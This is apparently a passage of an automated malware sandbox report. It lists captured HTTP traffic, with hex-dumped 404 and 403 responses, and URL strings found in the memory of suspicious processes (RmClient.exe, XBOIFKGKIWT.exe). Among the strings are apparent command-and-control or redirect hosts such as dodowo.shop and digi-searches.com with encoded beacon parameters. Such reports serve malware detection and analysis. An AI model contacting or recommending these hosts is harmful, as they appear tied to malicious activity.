6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 10 Jan 2025 19:49:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c 47 e4 1c d5 38 34 cb 6e 40 42 10 8d 7a 01 53 5f b0 e0 f7 04 ec 87 f3 2c 01 c3 bc d4 51 d1 f2 bb a2 49 e7 6d 1a 9a 08 d9 38 88 8d 20 ce 68 10 b3 c0 33 38 59 0f d5 2d cb 4a af 91 dd 14 1f d3 7b b5 42 3a c0 84 41 fc 06 51 12 ba e7 7e cc b8 22 43 92 79 e3 73 34 86 6f ee 79 ad e6 27 7e 72 95 98 6c 9c a4 42 b1 92 41 c1 61 46 68 8c 33 98 aa 62 32 71 9a 86 81 87 b3 20 89 6b 94 b1 bb d7 51 08 5d dc 12 ae 52 1a 07 9d 51 fc 36 4f fa e8 e7 bf fc f8 d3 77 7f 53 0a 28 e1 09 bd 25 bc da 90 10 bf a6 7c 60 d4 9f be fd ee bf ff fe 66 37 b8 97 44 11 4c 13 ab 68 f1 d1 47 30 2d 1e 0d d2 ec 3e 38 7c ce bb cd f9 97 47 21 11 ef c2 d1 bf 08 58 66 52 12 25 97 44 45 e7 c2 e9 cf 91 d6 07 b3 17 dc 55 49 27 57 41 0c a8 e6 ab ab 14 18 5e 07 4f 49 96 05 f1 88 21 17 4d 94 01 66 e4 39 0d 95 de 2c 50 2e 6a 17 35 66 5e f1 38 b9 a8 09 df 61 17 a0 29 25 17 35 c1 7c 51 b3 9b a6 65 d6 2f 6a 6d e7 ba ed 5c d4 14 5d 21 d7 19 f0 9b 69 3c 82 17 76 39 3a 4c 1e 30 0a 69 f0 f9 a8 10 08 df f8 7b 92 53 8f 28 bd 89 02 be 07 b3 20 d8 66 f2 85 f8 8a 4d 2f 6a 57 29 b8 a6 17 e6 3e c7 79 cd 44 83 e0 30 60 6e 09 0c d6 84 28 34 5f b3 07 97 84 ba 2d b3 6d da ca 74 da 3f a9 7d 7c 8a 9e 8d 03 86 86 41 48 10 7c 72 a7 37 46 24 26 14 10 7d f4 71 ed e4 74 98 c7 1e f7 01 35 d0 63 6d 72 89 29 4a 74 a6 93 fe bc 1d 79 2a d1 26 19 bd 11 7d 99 3b 61 79 ca d3 c4 33 c2 32 d6 23 7a 16 44 f0 0d 47 69 4f 8d c9 15 fa 0c 04 6b e6 25 0e 73 f2 78 a8 6a d3 3e 23 8c 81 98 a7 59 42 c1 4c 26 e4 9f 5f c1 60 d5 44 ff f5 d3 c7 bf 35 19 8f b7 51 30 bc 51 33 4d 9b 82 1d bc 31 87 9b 4e 17 f0 a9 0a 18 5c 35 02 3e 42 30 7d 42 bc 4c b5 74 4b Data Ascii: e99
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:50:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:50:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 19:50:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjn
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3H
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/display.cfm
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004010000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003550000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
